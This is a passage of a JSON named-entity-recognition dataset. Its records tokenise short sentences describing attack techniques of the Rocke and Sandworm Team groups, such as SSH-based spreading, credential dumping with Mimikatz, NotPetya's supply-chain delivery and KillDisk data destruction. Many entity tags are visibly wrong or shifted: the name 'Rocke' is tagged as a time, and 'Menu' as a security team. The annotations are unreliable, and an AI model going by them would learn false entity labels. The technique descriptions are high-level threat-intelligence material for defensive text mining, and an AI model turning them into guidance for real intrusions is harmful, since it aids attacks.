"O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "used", - "SSH", - "private", - "keys", - "on", - "the", - "infected", - "machine", - "to", - "spread", - "its", - "coinminer", - "throughout", - "a", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "can", - "detect", - "a", - "running", - "process's", - "PID", - "on", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "used", - "Python-based", - "malware", - "to", - "install", - "and", - "spread", - "their", - "coinminer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke's", - "miner", - "has", - "created", - "UPX-packed", - "files", - "in", - "the", - "Windows", - "Start", - "Menu", - "Folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "B-SecTeam", - "B-Tool" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "looked", - "for", - "IP", - "addresses", - "in", - "the", - "known_hosts", - "file", - "on", - "the", - "infected", - "system", - "and", - "attempted", - "to", - "SSH", - "into", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "distributed", - "cryptomining", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "modified", - "/etc/ld.so.preload", - "to", - "hook", - "libc", - "functions", - "in", - "order", - "to", - "hide", - "the", - "installed", - "dropper", - "and", - "mining", - "software", - "in", - "process", - "lists." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "spread", - "its", - "coinminer", - "via", - "SSH." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Rocke", - "used", - "scripts", - "which", - "detected", - "and", - "uninstalled", - "antivirus", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke's", - "miner", - "has", - "created", - "UPX-packed", - "files", - "in", - "the", - "Windows", - "Start", - "Menu", - "Folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "B-SecTeam", - "B-Tool" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "used", - "uname", - "-m", - "to", - "collect", - "the", - "name", - "and", - "information", - "about", - "the", - "infected", - "system's", - "kernel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "installed", - "a", - "systemd", - "service", - "script", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "changed", - "the", - "time", - "stamp", - "of", - "certain", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "used", - "shell", - "scripts", - "to", - "run", - "commands", - "which", - "would", - "obtain", - "persistence", - "and", - "execute", - "the", - "cryptocurrency", - "mining", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "executed", - "wget", - "and", - "curl", - "commands", - "to", - "Pastebin", - "over", - "the", - "HTTPS", - "protocol." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "used", - "Pastebin,", - "Gitee,", - "and", - "GitLab", - "for", - "Command", - "and", - "Control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "used", - "various", - "third-party", - "email", - "campaign", - "management", - "services", - "to", - "deliver", - "phishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "the", - "Telegram", - "Bot", - "API", - "from", - "Telegram", - "Messenger", - "to", - "send", - "and", - "receive", - "commands", - "to", - "its", - "Python", - "backdoor.", - "Sandworm", - "Team", - "also", - "used", - "legitimate", - "M.E.Doc", - "software", - "update", - "check", - "requests", - "for", - "sending", - "and", - "receiving", - "commands", - "and", - "hosted", - "malicious", - "payloads", - "on", - "putdrive.com." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "a", - "large-scale", - "botnet", - "to", - "target", - "Small", - "Office/Home", - "Office", - "(SOHO)", - "network", - "devices." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Org", - "O", - "I-Org", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "preparation", - "for", - "its", - "attack", - "against", - "the", - "2018", - "Winter", - "Olympics,", - "Sandworm", - "Team", - "conducted", - "online", - "research", - "of", - "partner", - "organizations", - "listed", - "on", - "an", - "official", - "PyeongChang", - "Olympics", - "partnership", - "site." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "I-Area", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "ROT13", - "encoding,", - "AES", - "encryption", - "and", - "compression", - "with", - "the", - "zlib", - "library", - "for", - "their", - "Python-based", - "backdoor." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "distributed", - "NotPetya", - "by", - "compromising", - "the", - "legitimate", - "Ukrainian", - "accounting", - "software", - "M.E.Doc", - "and", - "replacing", - "a", - "legitimate", - "software", - "update", - "with", - "a", - "malicious", - "one." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team's", - "CredRaptor", - "tool", - "can", - "collect", - "saved", - "passwords", - "from", - "various", - "internet", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "the", - "BlackEnergy", - "KillDisk", - "component", - "to", - "overwrite", - "files", - "on", - "Windows-based", - "Human-Machine", - "Interfaces." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "Prestige", - "ransomware", - "to", - "encrypt", - "data", - "at", - "targeted", - "organizations", - "in", - "transportation", - "and", - "related", - "logistics", - "industries", - "in", - "Ukraine", - "and", - "Poland." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "B-Area", - "O", - "B-Area" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "exfiltrates", - "data", - "of", - "interest", - "from", - "enterprise", - "databases", - "using", - "Adminer." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "exfiltrated", - "internal", - "documents,", - "files,", - "and", - "other", - "data", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team's", - "VBS", - "backdoor", - "can", - "decode", - "Base64-encoded", - "data", - "and", - "save", - "it", - "to", - "the", - "%TEMP%", - "folder.", - "The", - "group", - "also", - "decrypted", - "received", - "information", - "using", - "the", - "Triple", - "DES", - "algorithm", - "and", - "decompresses", - "it", - "using", - "GZip." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "the", - "BlackEnergy", - "KillDisk", - "component", - "to", - "corrupt", - "the", - "infected", - "system's", - "master", - "boot", - "record." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "a", - "tool", - "to", - "query", - "Active", - "Directory", - "using", - "LDAP,", - "discovering", - "information", - "about", - "usernames", - "listed", - "in", - "AD." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "stolen", - "credentials", - "to", - "access", - "administrative", - "accounts", - "within", - "the", - "domain." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "conducted", - "technical", - "reconnaissance", - "of", - "the", - "Parliament", - "of", - "Georgia's", - "official", - "internet", - "domain", - "prior", - "to", - "its", - "2019", - "attack." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-OffAct" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "registered", - "domain", - "names", - "and", - "created", - "URLs", - "that", - "are", - "often", - "designed", - "to", - "mimic", - "or", - "spoof", - "legitimate", - "websites,", - "such", - "as", - "email", - "login", - "pages,", - "online", - "file", - "sharing", - "and", - "storage", - "websites,", - "and", - "password", - "reset", - "pages,", - "while", - "also", - "hosting", - "these", - "items", - "on", - "legitimate,", - "compromised", - "network", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "used", - "malware", - "to", - "enumerate", - "email", - "settings,", - "including", - "usernames", - "and", - "passwords,", - "from", - "the", - "M.E.Doc", - "application." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "created", - "email", - "accounts", - "that", - "mimic", - "legitimate", - "organizations", - "for", - "its", - "spearphishing", - "operations." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "obtained", - "valid", - "emails", - "addresses", - "while", - "conducting", - "research", - "against", - "target", - "organizations", - "that", - "were", - "subsequently", - "used", - "in", - "spearphishing", - "campaigns." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Sandworm", - "Team's", - "research", - "of", - "potential", - "victim", - "organizations", - "included", - "the", - "identification", - "and", - "collection", - "of", - "employee", - "information." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "temporarily", - "disrupted", - "service", - "to", - "Georgian", - "government,", - "non-government,", - "and", - "private", - "sector", - "websites", - "after", - "compromising", - "a", - "Georgian", - "web", - "hosting", - "provider", - "in", - "2019." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Area", - "B-Idus", - "B-Idus", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "sent", - "system", - "information", - "to", - "its", - "C2", - "server", - "using", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "exploits", - "public-facing", - "applications", - "for", - "initial", - "access", - "and", - "to", - "acquire", - "infrastructure,", - "such", - "as", - "exploitation", - "of", - "the", - "EXIM", - "mail", - "transfer", - "agent", - "in", - "Linux", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "exploited", - "vulnerabilities", - "in", - "Microsoft", - "PowerPoint", - "via", - "OLE", - "objects", - "(CVE-2014-4114)", - "and", - "Microsoft", - "Word", - "via", - "crafted", - "TIFF", - "images", - "(CVE-2013-3906)." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "defaced", - "approximately", - "15,000", - "websites", - "belonging", - "to", - "Georgian", - "government,", - "non-government,", - "and", - "private", - "sector", - "organizations", - "in", - "2019." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-Idus", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "Dropbear", - "SSH", - "with", - "a", - "hardcoded", - "backdoor", - "password", - "to", - "maintain", - "persistence", - "within", - "the", - "target", - "network.", - "Sandworm", - "Team", - "has", - "also", - "used", - "VPN", - "tunnels", - "established", - "in", - "legitimate", - "software", - "company", - "infrastructure", - "to", - "gain", - "access", - "to", - "internal", - "networks", - "of", - "that", - "software", - "company's", - "users." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Tool", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "backdoors", - "that", - "can", - "delete", - "files", - "used", - "in", - "an", - "attack", - "from", - "an", - "infected", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "enumerated", - "files", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "pushed", - "additional", - "malicious", - "tools", - "onto", - "an", - "infected", - "system", - "to", - "steal", - "user", - "credentials,", - "move", - "laterally,", - "and", - "destroy", - "data." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "a", - "keylogger", - "to", - "capture", - "keystrokes", - "by", - "using", - "the", - "SetWindowsHookEx", - "function." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "its", - "plainpwd", - "tool,", - "a", - "modified", - "version", - "of", - "Mimikatz,", - "and", - "comsvcs.dll", - "to", - "dump", - "Windows", - "credentials", - "from", - "system", - "memory." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "`move`", - "to", - "transfer", - "files", - "to", - "a", - "network", - "share", - "and", - "has", - "copied", - "payloads--such", - "as", - "Prestige", - "ransomware--to", - "an", - "Active", - "Directory", - "Domain", - "Controller", - "and", - "distributed", - "via", - "the", - "Default", - "Domain", - "Group", - "Policy", - "Object." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "tricked", - "unwitting", - "recipients", - "into", - "clicking", - "on", - "spearphishing", - "attachments", - "and", - "enabling", - "malicious", - "macros", - "embedded", - "within", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "tricked", - "unwitting", - "recipients", - "into", - "clicking", - "on", - "malicious", - "hyperlinks", - "within", - "emails", - "crafted", - "to", - "resemble", - "trustworthy", - "senders." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "developed", - "malware", - "for", - "its", - "operations,", - "including", - "malicious", - "mobile", - "applications", - "and", - "destructive", - "malware", - "such", - "as", - "NotPetya", - "and", - "Olympic", - "Destroyer." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "masqueraded", - "malicious", - "installers", - "as", - "Windows", - "update", - "packages", - "to", - "evade", - "defense", - "and", - "entice", - "users", - "to", - "execute", - "binaries." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "avoided", - "detection", - "by", - "naming", - "a", - "malicious", - "binary", - "explorer.exe." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "`ntdsutil.exe`", - "to", - "back", - "up", - "the", - "Active", - "Directory", - "database,", - "likely", - "for", - "credential", - "access." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "intercepter-NG", - "to", - "sniff", - "passwords", - "in", - "network", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "port", - "6789", - "to", - "accept", - "connections", - "on", - "the", - "group's", - "SSH", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "Base64", - "encoding", - "within", - "malware", - "variants." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "PowerShell", - "scripts", - "to", - "run", - "a", - "credential", - "harvesting", - "tool", - "in", - "memory", - "to", - "evade", - "defenses." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team's", - "BCS-server", - "tool", - "can", - "create", - "an", - "internal", - "proxy", - "server", - "to", - "redirect", - "traffic", - "from", - "the", - "adversary-controlled", - "C2", - "to", - "internal", - "servers", - "which", - "may", - "not", - "be", - "connected", - "to", - "the", - "internet,", - "but", - "are", - "interconnected", - "locally." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "remote", - "administration", - "tools", - "or", - "remote", - "industrial", - "control", - "system", - "client", - "software", - "for", - "execution", - "and", - "to", - "maliciously", - "release", - "electricity", - "breakers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "used", - "a", - "tool", - "to", - "query", - "Active", - "Directory", - "using", - "LDAP,", - "discovering", - "information", - "about", - "computers", - "listed", - "in", - "AD." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "used", - "a", - "backdoor", - "which", - "could", - "execute", - "a", - "supplied", - "DLL", - "using", - "rundll32.exe." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "copied", - "payloads", - "to", - "the", - "`ADMIN$`", - "share", - "of", - "remote", - "systems", - "and", - "run", - "<code>net", - "use</code>", - "to", - "connect", - "to", - "network", - "shares." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "researched", - "Ukraine's", - "unique", - "legal", - "entity", - "identifier", - "(called", - "an", - "\"EDRPOU\"", - "number),", - "including", - "running", - "queries", - "on", - "the", - "EDRPOU", - "website,", - "in", - "preparation", - "for", - "the", - "NotPetya", - "attack.", - "Sandworm", - "Team", - "has", - "also", - "researched", - "third-party", - "websites", - "to", - "help", - "it", - "craft", - "credible", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "conducted", - "research", - "against", - "potential", - "victim", - "websites", - "as", - "part", - "of", - "its", - "operational", - "planning." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "leased", - "servers", - "from", - "resellers", - "instead", - "of", - "leasing", - "infrastructure", - "directly", - "from", - "hosting", - "companies", - "to", - "enable", - "its", - "operations." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "compromised", - "legitimate", - "Linux", - "servers", - "running", - "the", - "EXIM", - "mail", - "transfer", - "agent", - "for", - "use", - "in", - "subsequent", - "campaigns." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "creates", - "credential", - "capture", - "webpages", - "to", - "compromise", - "existing,", - "legitimate", - "social", - "media", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "established", - "social", - "media", - "accounts", - "to", - "disseminate", - "victim", - "internal-only", - "documents", - "and", - "other", - "sensitive", - "data." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sandworm", - "Team", - "has", - "researched", - "software", - "code", - "to", - "enable", - "supply-chain", - "operations,", - "most", - "notably", - "for", - "the", - "2017", - "NotPetya", - "attack.", - "Sandworm", - "Team", - "also", - "collected", - "a", - "list", - "of", - "computers", - "using", - "specific", - "software", - "as", - "part", 